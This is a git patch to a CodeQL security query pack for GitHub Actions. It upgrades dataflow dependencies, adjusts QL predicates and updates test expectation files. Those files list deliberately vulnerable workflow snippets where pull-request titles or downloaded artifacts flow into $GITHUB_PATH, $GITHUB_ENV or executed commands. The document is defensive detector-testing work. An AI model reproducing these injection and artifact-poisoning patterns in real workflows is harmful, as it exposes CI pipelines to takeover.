.github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | -| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | -| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | -| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | -| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | -| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | -| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | -| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | -| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | -| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:38:11:38:61 | ./x.py build -j$(nproc) --compiler gcc --skip-build | provenance | | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:19:14:20:21 | sh foo/cmd\n | provenance | | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:18:14:18:19 | sh cmd | provenance | | +| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:19:14:19:22 | ./foo/cmd | provenance | | +| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:17:14:18:20 | ./bar/cmd\n | provenance | | +| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:17:14:18:20 | ./bar/cmd\n | provenance | | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:14:22:23 | npm install\nnpm run lint\n | provenance | | +| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:22:14:22:22 | ./foo/cmd | provenance | | +| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:22:14:22:18 | ./cmd | provenance | | +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | provenance | | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:23:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\nls \| grep -E "*.(tar.gz\|zip)$" >> "${GITHUB_ENV}"\nls \| grep -E "*.(txt\|md)$" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | provenance | | +| .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | provenance | | nodes | .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | semmle.label | Uses Step | | .github/workflows/artifactpoisoning11.yml:38:11:38:77 | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | semmle.label | ./sonarcloud-data/x.py build -j$(nproc) --compiler gcc --skip-build | From ba4dd2b0edfb0493d3e282e4195aba735e4d20a3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 6 Jun 2024 17:23:10 +0200 Subject: [PATCH 0321/1267] Update to latest dataflow shared library --- ql/lib/codeql-pack.lock.yml | 12 +- ql/lib/codeql/actions/DataFlow.qll | 9 +- ql/lib/codeql/actions/TaintTracking.qll | 5 +- .../internal/DataFlowImplSpecific.qll | 3 +- .../dataflow/internal/DataFlowPrivate.qll | 39 ++++- .../dataflow/internal/DataFlowPublic.qll | 2 +- .../internal/TaintTrackingImplSpecific.qll | 3 +- .../internal/TaintTrackingPrivate.qll | 8 +- ql/lib/qlpack.gbo | 13 -- ql/lib/qlpack.yml | 8 +- ql/src/codeql-pack.lock.yml | 12 +- ql/test/codeql-pack.lock.yml | 12 +- .../CWE-020/CompositeActionsSinks.expected | 8 +- .../CWE-020/CompositeActionsSources.expected | 6 +- .../CompositeActionsSummaries.expected | 6 +- .../CWE-020/ReusableWorkflowsSinks.expected | 2 +- .../CWE-020/ReusableWorkflowsSources.expected | 6 +- .../ReusableWorkflowsSummaries.expected | 10 +- .../CWE-077/EnvPathInjectionCritical.expected | 12 +- .../CWE-077/EnvPathInjectionMedium.expected | 12 +- .../CWE-077/EnvVarInjectionCritical.expected | 24 +-- .../CWE-077/EnvVarInjectionMedium.expected | 24 +-- .../CWE-094/CodeInjectionCritical.expected | 160 +++++++++--------- .../CWE-094/CodeInjectionMedium.expected | 160 +++++++++--------- .../ArtifactPoisoningCritical.expected | 26 +-- .../CWE-829/ArtifactPoisoningMedium.expected | 26 +-- 26 files changed, 316 insertions(+), 292 deletions(-) delete mode 100644 ql/lib/qlpack.gbo diff --git a/ql/lib/codeql-pack.lock.yml b/ql/lib/codeql-pack.lock.yml index 84a6ccba26d..4b8239b7f6c 100644 --- a/ql/lib/codeql-pack.lock.yml +++ b/ql/lib/codeql-pack.lock.yml @@ -2,15 +2,15 @@ lockVersion: 1.0.0 dependencies: codeql/controlflow: - version: 0.1.8 + version: 1.0.0 codeql/dataflow: - version: 0.1.8 + version: 1.0.0 codeql/ssa: - version: 0.2.8 + version: 1.0.0 codeql/typetracking: - version: 0.2.8 + version: 1.0.0 codeql/util: - version: 0.2.8 + version: 1.0.0 codeql/yaml: - version: 0.1.5 + version: 1.0.0 compiled: false diff --git a/ql/lib/codeql/actions/DataFlow.qll b/ql/lib/codeql/actions/DataFlow.qll index 1e30061bf45..feafe4f68bb 100644 --- a/ql/lib/codeql/actions/DataFlow.qll +++ b/ql/lib/codeql/actions/DataFlow.qll @@ -2,18 +2,21 @@ * Provides classes for performing local (intra-procedural) and * global (inter-procedural) data flow analyses. */ + +import codeql.Locations + module DataFlow { private import codeql.dataflow.DataFlow private import codeql.actions.dataflow.internal.DataFlowImplSpecific - import DataFlowMake + import DataFlowMake import codeql.actions.dataflow.internal.DataFlowPublic // debug private import codeql.actions.dataflow.internal.TaintTrackingImplSpecific import codeql.dataflow.internal.DataFlowImplConsistency as DFIC - module ActionsConsistency implements DFIC::InputSig { } + module ActionsConsistency implements DFIC::InputSig { } module Consistency { - import DFIC::MakeConsistency + import DFIC::MakeConsistency } } diff --git a/ql/lib/codeql/actions/TaintTracking.qll b/ql/lib/codeql/actions/TaintTracking.qll index 16d5d826aa8..8203a54dfeb 100644 --- a/ql/lib/codeql/actions/TaintTracking.qll +++ b/ql/lib/codeql/actions/TaintTracking.qll @@ -2,9 +2,12 @@ * Provides classes for performing local (intra-procedural) and * global (inter-procedural) taint-tracking analyses. */ + +import codeql.Locations + module TaintTracking { private import codeql.actions.dataflow.internal.DataFlowImplSpecific private import codeql.actions.dataflow.internal.TaintTrackingImplSpecific private import codeql.dataflow.TaintTracking - import TaintFlowMake + import TaintFlowMake } diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll index 2d3b9696ef6..2e3c13f164c 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll @@ -4,8 +4,9 @@ */ private import codeql.dataflow.DataFlow +private import codeql.Locations -module ActionsDataFlow implements InputSig { +module ActionsDataFlow implements InputSig { import DataFlowPrivate as Private import DataFlowPublic import Private diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index b6b7cd53927..17b29f57025 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -1,3 +1,4 @@ +private import codeql.util.Unit private import codeql.dataflow.DataFlow private import codeql.actions.Ast private import codeql.actions.Cfg as Cfg @@ -8,6 +9,8 @@ private import codeql.actions.dataflow.ExternalFlow private import codeql.actions.dataflow.FlowSteps private import codeql.actions.dataflow.FlowSources +class DataFlowSecondLevelScope = Unit; + cached newtype TNode = TExprNode(DataFlowExpr e) @@ -78,6 +81,9 @@ class DataFlowCall instanceof Cfg::Node { string getName() { result = super.getAstNode().(Uses).getCallee() } DataFlowCallable getEnclosingCallable() { result = super.getScope() } + + /** Gets a best-effort total ordering. */ + int totalorder() { none() } } /** @@ -104,6 +110,9 @@ class DataFlowCallable instanceof Cfg::CfgScope { .indexOf(["/action.yml", "/action.yaml"])) else none() } + + /** Gets a best-effort total ordering. */ + int totalorder() { none() } } newtype TReturnKind = TNormalReturn() @@ -158,6 +167,19 @@ newtype TContent = predicate forceHighPrecision(Content c) { c instanceof FieldContent } +class NodeRegion instanceof Unit { + string toString() { result = "NodeRegion" } + + predicate contains(Node n) { none() } + + int totalOrder() { result = 1 } +} + +/** + * Holds if the nodes in `nr` are unreachable when the call context is `call`. + */ +predicate isUnreachableInCall(NodeRegion nr, DataFlowCall call) { none() } + class ContentApprox = ContentSet; ContentApprox getContentApprox(Content c) { result = c } @@ -287,9 +309,13 @@ predicate localFlowStep(Node nodeFrom, Node nodeTo) { } /** - * a simple local flow step that should always preserve the call context (same callable) + * This is the local flow predicate that is used as a building block in global + * data flow. */ -predicate simpleLocalFlowStep(Node nodeFrom, Node nodeTo) { localFlowStep(nodeFrom, nodeTo) } +cached +predicate simpleLocalFlowStep(Node nodeFrom, Node nodeTo, string model) { + localFlowStep(nodeFrom, nodeTo) and model = "" +} /** * Holds if data can flow from `node1` to `node2` through a non-local step @@ -366,11 +392,6 @@ predicate clearsContent(Node n, ContentSet c) { none() } */ predicate expectsContent(Node n, ContentSet c) { none() } -/** - * Holds if the node `n` is unreachable when the call context is `call`. - */ -predicate isUnreachableInCall(Node n, DataFlowCall call) { none() } - /** * Holds if flow is allowed to pass from parameter `p` and back to itself as a * side-effect, resulting in a summary from `p` to itself. @@ -400,3 +421,7 @@ predicate additionalLambdaFlowStep(Node nodeFrom, Node nodeTo, boolean preserves * This compression is normally done to not show SSA steps, casts, etc. */ predicate neverSkipInPathGraph(Node node) { any() } + +predicate knownSourceModel(Node source, string model) { none() } + +predicate knownSinkModel(Node sink, string model) { none() } diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index 87e8124db91..96568f86db3 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll @@ -178,7 +178,7 @@ class FieldContent extends Content, TFieldContent { predicate hasLocalFlow(Node n1, Node n2) { n1 = n2 or - simpleLocalFlowStep(n1, n2) or + simpleLocalFlowStep(n1, n2, _) or exists(ContentSet c | ctxFieldReadStep(n1, n2, c)) } diff --git a/ql/lib/codeql/actions/dataflow/internal/TaintTrackingImplSpecific.qll b/ql/lib/codeql/actions/dataflow/internal/TaintTrackingImplSpecific.qll index c2d51748f20..2fd062e7660 100644 --- a/ql/lib/codeql/actions/dataflow/internal/TaintTrackingImplSpecific.qll +++ b/ql/lib/codeql/actions/dataflow/internal/TaintTrackingImplSpecific.qll @@ -3,9 +3,10 @@ * Implementation of https://github.com/github/codeql/blob/main/shared/dataflow/codeql/dataflow/TaintTracking.qll */ +private import codeql.Locations private import codeql.dataflow.TaintTracking private import DataFlowImplSpecific -module ActionsTaintTracking implements InputSig { +module ActionsTaintTracking implements InputSig { import TaintTrackingPrivate } diff --git a/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll index a7e0d23df2b..b8647339d24 100644 --- a/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/TaintTrackingPrivate.qll @@ -14,12 +14,16 @@ private import codeql.actions.Ast */ predicate defaultTaintSanitizer(DataFlow::Node node) { none() } +// predicate defaultAdditionalTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo) { +// any(AdditionalTaintStep s).step(nodeFrom, nodeTo) +// } /** * Holds if the additional step from `nodeFrom` to `nodeTo` should be included * in all global taint flow configurations. */ -predicate defaultAdditionalTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo) { - any(AdditionalTaintStep s).step(nodeFrom, nodeTo) +cached +predicate defaultAdditionalTaintStep(DataFlow::Node nodeFrom, DataFlow::Node nodeTo, string model) { + any(AdditionalTaintStep s).step(nodeFrom, nodeTo) and model = "" } /** diff --git a/ql/lib/qlpack.gbo b/ql/lib/qlpack.gbo deleted file mode 100644 index c77f7924c12..00000000000 --- a/ql/lib/qlpack.gbo +++ /dev/null @@ -1,13 +0,0 @@ ---- -warnOnImplicitThis: false -name: seclab/actions-all -version: 0.0.1-dev -groups: actions -extractor: actions -library: true -tests: test -dependencies: - codeql/javascript-all: ^0.8.7 - "codeql/controlflow": "*" - "codeql/dataflow": "*" - "codeql/ssa": "*" diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index bf05e80e0a6..48045dbf679 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -4,10 +4,10 @@ warnOnImplicitThis: true name: githubsecuritylab/actions-all version: 0.0.33 dependencies: - codeql/util: ^0.2.0 - codeql/yaml: ^0.1.2 - codeql/controlflow: ^0.1.0 - codeql/dataflow: ^0.1.0 + codeql/util: ^1.0.0 + codeql/yaml: ^1.0.0 + codeql/controlflow: ^1.0.0 + codeql/dataflow: ^1.0.0 dbscheme: yaml.dbscheme extractor: yaml groups: diff --git a/ql/src/codeql-pack.lock.yml b/ql/src/codeql-pack.lock.yml index 84a6ccba26d..4b8239b7f6c 100644 --- a/ql/src/codeql-pack.lock.yml +++ b/ql/src/codeql-pack.lock.yml @@ -2,15 +2,15 @@ lockVersion: 1.0.0 dependencies: codeql/controlflow: - version: 0.1.8 + version: 1.0.0 codeql/dataflow: - version: 0.1.8 + version: 1.0.0 codeql/ssa: - version: 0.2.8 + version: 1.0.0 codeql/typetracking: - version: 0.2.8 + version: 1.0.0 codeql/util: - version: 0.2.8 + version: 1.0.0 codeql/yaml: - version: 0.1.5 + version: 1.0.0 compiled: false diff --git a/ql/test/codeql-pack.lock.yml b/ql/test/codeql-pack.lock.yml index 84a6ccba26d..4b8239b7f6c 100644 --- a/ql/test/codeql-pack.lock.yml +++ b/ql/test/codeql-pack.lock.yml @@ -2,15 +2,15 @@ lockVersion: 1.0.0 dependencies: codeql/controlflow: - version: 0.1.8 + version: 1.0.0 codeql/dataflow: - version: 0.1.8 + version: 1.0.0 codeql/ssa: - version: 0.2.8 + version: 1.0.0 codeql/typetracking: - version: 0.2.8 + version: 1.0.0 codeql/util: - version: 0.2.8 + version: 1.0.0 codeql/yaml: - version: 0.1.5 + version: 1.0.0 compiled: false diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected b/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected index 31e367ac317..0a5bfe433e9 100644 --- a/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected +++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected @@ -1,8 +1,8 @@ edges -| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:28:18:28:43 | inputs.who-to-greet | -| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:35:25:35:50 | inputs.who-to-greet | -| action1/action.yml:24:7:31:4 | Uses Step: replace [value] | action1/action.yml:32:18:32:51 | steps.replace.outputs.value | -| action1/action.yml:28:18:28:43 | inputs.who-to-greet | action1/action.yml:24:7:31:4 | Uses Step: replace [value] | +| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:28:18:28:43 | inputs.who-to-greet | provenance | | +| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:35:25:35:50 | inputs.who-to-greet | provenance | | +| action1/action.yml:24:7:31:4 | Uses Step: replace [value] | action1/action.yml:32:18:32:51 | steps.replace.outputs.value | provenance | | +| action1/action.yml:28:18:28:43 | inputs.who-to-greet | action1/action.yml:24:7:31:4 | Uses Step: replace [value] | provenance | | nodes | action1/action.yml:4:3:4:14 | input who-to-greet | semmle.label | input who-to-greet | | action1/action.yml:24:7:31:4 | Uses Step: replace [value] | semmle.label | Uses Step: replace [value] | diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected b/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected index 6540b191068..87c185fb5e1 100644 --- a/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected +++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected @@ -1,7 +1,7 @@ edges -| action1/action.yml:42:7:44:4 | Uses Step: changed-files | action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | -| action1/action.yml:44:7:48:70 | Run Step: source [tainted] | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | -| action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | action1/action.yml:44:7:48:70 | Run Step: source [tainted] | +| action1/action.yml:42:7:44:4 | Uses Step: changed-files | action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | provenance | | +| action1/action.yml:44:7:48:70 | Run Step: source [tainted] | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | provenance | | +| action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | action1/action.yml:44:7:48:70 | Run Step: source [tainted] | provenance | | nodes | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | semmle.label | steps.source.outputs.tainted | | action1/action.yml:42:7:44:4 | Uses Step: changed-files | semmle.label | Uses Step: changed-files | diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected b/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected index 063a26bd6ef..067edb68bb1 100644 --- a/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected +++ b/ql/test/query-tests/Security/CWE-020/CompositeActionsSummaries.expected @@ -1,7 +1,7 @@ edges -| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:41:30:41:55 | inputs.who-to-greet | -| action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | -| action1/action.yml:41:30:41:55 | inputs.who-to-greet | action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | +| action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:41:30:41:55 | inputs.who-to-greet | provenance | | +| action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | provenance | | +| action1/action.yml:41:30:41:55 | inputs.who-to-greet | action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | provenance | | nodes | action1/action.yml:4:3:4:14 | input who-to-greet | semmle.label | input who-to-greet | | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | semmle.label | steps.reflector.outputs.reflected | diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected index a45b9acf416..f2178960774 100644 --- a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected +++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSinks.expected @@ -1,5 +1,5 @@ edges -| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | +| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | provenance | | nodes | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | semmle.label | input config-path | | .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | semmle.label | inputs.config-path | diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected index 2cabeaca9fa..c76034f74d4 100644 --- a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected +++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSources.expected @@ -1,7 +1,7 @@ edges -| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | -| .github/workflows/reusable_workflow.yml:23:21:23:63 | steps.step2.outputs.all_changed_files | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | -| .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | .github/workflows/reusable_workflow.yml:23:21:23:63 | steps.step2.outputs.all_changed_files | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | provenance | | +| .github/workflows/reusable_workflow.yml:23:21:23:63 | steps.step2.outputs.all_changed_files | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | provenance | | +| .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | .github/workflows/reusable_workflow.yml:23:21:23:63 | steps.step2.outputs.all_changed_files | provenance | | nodes | .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | semmle.label | jobs.job1.outputs.job-output2 | | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | semmle.label | Job outputs node [job-output2] | diff --git a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected index a6be99e1bd0..8589d82d825 100644 --- a/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected +++ b/ql/test/query-tests/Security/CWE-020/ReusableWorkflowsSummaries.expected @@ -1,9 +1,9 @@ edges -| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | -| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | -| .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | -| .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | -| .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | +| .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | provenance | | +| .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | provenance | | +| .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | provenance | | +| .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | .github/workflows/reusable_workflow.yml:22:21:22:57 | steps.step1.outputs.step-output | provenance | | +| .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | provenance | | nodes | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | semmle.label | input config-path | | .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | semmle.label | jobs.job1.outputs.job-output1 | diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected index c6091f1fc23..7fab238795c 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionCritical.expected @@ -1,10 +1,10 @@ edges -| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | -| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | -| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | -| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | -| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | -| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | +| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | provenance | | +| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | provenance | | +| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | provenance | | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | provenance | | +| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | provenance | | +| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | provenance | | nodes | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | semmle.label | echo $(echo "$PATHINJ") >> $GITHUB_PATH | diff --git a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected index d3b90de71e3..ea360bc56df 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvPathInjectionMedium.expected @@ -1,10 +1,10 @@ edges -| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | -| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | -| .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | -| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | -| .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | -| .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | +| .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | provenance | | +| .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | 